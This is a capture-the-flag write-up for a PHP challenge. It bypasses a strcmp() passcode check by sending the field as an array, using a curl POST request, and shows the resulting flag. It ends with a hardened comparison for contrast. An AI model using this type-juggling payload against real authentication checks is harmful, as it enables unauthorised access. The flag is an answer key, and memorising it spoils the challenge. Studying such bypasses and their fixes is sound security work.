Tags: php web
First of all, we look at the website's HTML and see a comment:
It tells us that we can view the source code if we send a `source` parameter, so we try sending it via GET first: https://find-pass-code-one.kshackzone.com/?source
It works, and now we have the page source code:
```
";
}
}
if (isset($_GET["source"])) {
print show_source(__FILE__);
}
?>
```
From this line: `if (isset($_POST["pass_code"]))`
we see that we have to set `pass_code` to something, and to get the flag we need to pass this comparison:
`if (strcmp($_POST["pass_code"], $flag) == 0 )`
Now, in PHP `null == 0` evaluates to true, and `strcmp()` returns null when it is given something that is not a string, such as an array.
So we send `pass_code` as an array by writing it as `pass_code[]`, with a single space as its value (%20 if it were sent via GET, but since it is in a POST body we can just write " ").
We will do it with curl, but you can use anything you like:
```
$ curl -X POST -d "pass_code[]= " https://find-pass-code-one.kshackzone.com/
```
and we get the flag:
KCTF Flag : KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}
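
The comparison above next to a hardened version, as an added example that is not the challenge's code. The secret, the function names `loose_check` and `strict_check`, and the inputs are constructed for illustration; the null return applies to PHP before 8, while PHP 8 and later throw a `TypeError` for an array argument.

```php
<?php
// Added example: constructed secret, not the challenge's flag.
$secret = 'constructed-secret-value';

// Loose check in the style of the page's comparison.
// PHP < 8: strcmp() given an array emits a warning and returns NULL,
// and NULL == 0 is true, so the check passes without knowing the secret.
// PHP >= 8: strcmp() throws TypeError instead, which is caught below.
function loose_check($input, string $secret): bool
{
    try {
        return @strcmp($input, $secret) == 0;
    } catch (TypeError $e) {
        return false; // array argument rejected by the engine
    }
}

// Hardened check: insist on a string, then compare in constant time.
// hash_equals() takes the known value first and the user value second.
function strict_check($input, string $secret): bool
{
    return is_string($input) && hash_equals($secret, $input);
}

// Constructed inputs: what PHP builds from "pass_code=..." and "pass_code[]= ".
$cases = [
    'correct string' => $secret,
    'wrong string'   => 'guess',
    'array'          => [' '],
];

foreach ($cases as $label => $input) {
    printf(
        "%-15s loose=%-5s strict=%s\n",
        $label,
        var_export(loose_check($input, $secret), true),
        var_export(strict_check($input, $secret), true)
    );
}
```

Only the array row differs between interpreter versions for `loose_check`; `strict_check` rejects it on every version because the type is validated before any comparison takes place.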